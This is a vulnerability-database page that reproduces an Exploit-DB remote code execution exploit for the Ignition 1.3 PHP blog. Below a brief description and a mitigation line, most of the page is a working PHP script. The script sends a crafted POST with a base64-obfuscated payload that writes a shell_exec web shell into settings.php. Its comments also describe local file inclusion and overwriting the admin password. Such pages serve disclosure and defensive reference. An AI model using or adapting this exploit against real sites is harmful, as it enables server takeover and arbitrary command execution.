header-logo
Suggest Exploit
vendor:
Ignition
by:
cOndemned
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Ignition
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Ignition 1.3 Remote Code Execution Exploit

The Ignition 1.3 version is vulnerable to remote code execution. Attackers can overwrite the settings.php file by sending a specially crafted POST request and injecting malicious code into one of the variables. This allows attackers to execute arbitrary commands on the target server.

Mitigation:

Update to a patched version of Ignition. Ensure that user input is properly validated and sanitized to prevent code injection.
Source

Exploit-DB raw data:

<?php

/*

Ignition 1.3 Remote Code Execution Exploit
by cOndemned
download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz


source of i-options.php

	1.	<?php
	2.	session_start();
	3.	if ($_POST['submit']) {
	4.	if ($FH = @fopen('data/settings.php', 'w')) {
	5.		@fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
	6.	$uri = "'.$_POST['uri'].'";
	7.	$suri = "'.$_POST['suri'].'";
	8.	$blogtitle = "'.$_POST['title'].'";
	9.	$description = "'.$_POST['description'].'";
	10.	$postid = "'.$_POST['id'].'";
	11.	$author = "'.$_POST['author'].'";
	12.	$skin = "'.$_POST['skin'].'";
	13.	$gravatar = "'.$_POST['gravatar'].'";
	14.	$twitter = "' . $_POST['twitter'] . '";
	15.	$identica = "' . $_POST['identica'] . '";
	16.	$book = "' . $_POST['book'] . '";
	17.	$game = "' . $_POST['game'] . '";
	18.	$language = "' . $_POST['lang'] . '";
	19.	
	20.	require_once("template.php");
	21.	require_once("lang/$language.php");');
	22.		#fclose($FH);
	23.	}

We can overwrite setting.php by simply sending specially crafted POST request, 
and put some evil code into one of the variables. After running my PoC line with
$language var will be:

	$language = "en";echo @shell_exec($_GET['cmd']);$wtf="";

Where "en" is default language and without filling this field correctly admin 
will see error while trying to access blog index. 

other attacks scenarios:

	- attacker can use $_POST['language'] variable to exploit Local File 
	Inclusion (lines 18 and 21)

	- fill $_POST['pass'] with new password (md5 hashed) to overwrite admins
	password

	- etc...
*/


$target = 'http://localhost/ignition/';

$post = array
(
	'uri'		=> $target,
	'suri'		=> $target,
	'description'	=> 'Just another lame php blog script owned :<',
	'skin'		=> 'default',
	'lang'		=> base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
	'submit'	=> 1
);

$sock = curl_init();

curl_setopt_array
(
	$sock, 
	array
	(
		CURLOPT_URL 		=> "$target/i-options.php",
		CURLOPT_RETURNTRANSFER	=> true,
		CURLOPT_POST		=> true,
		CURLOPT_POSTFIELDS	=> http_build_query($post)
	)
);

curl_exec($sock);
curl_close($sock);

echo "Check: $target/data/settings.php?cmd=[system_command]";

?>

Navigation

Suggest Exploit

Services By CQR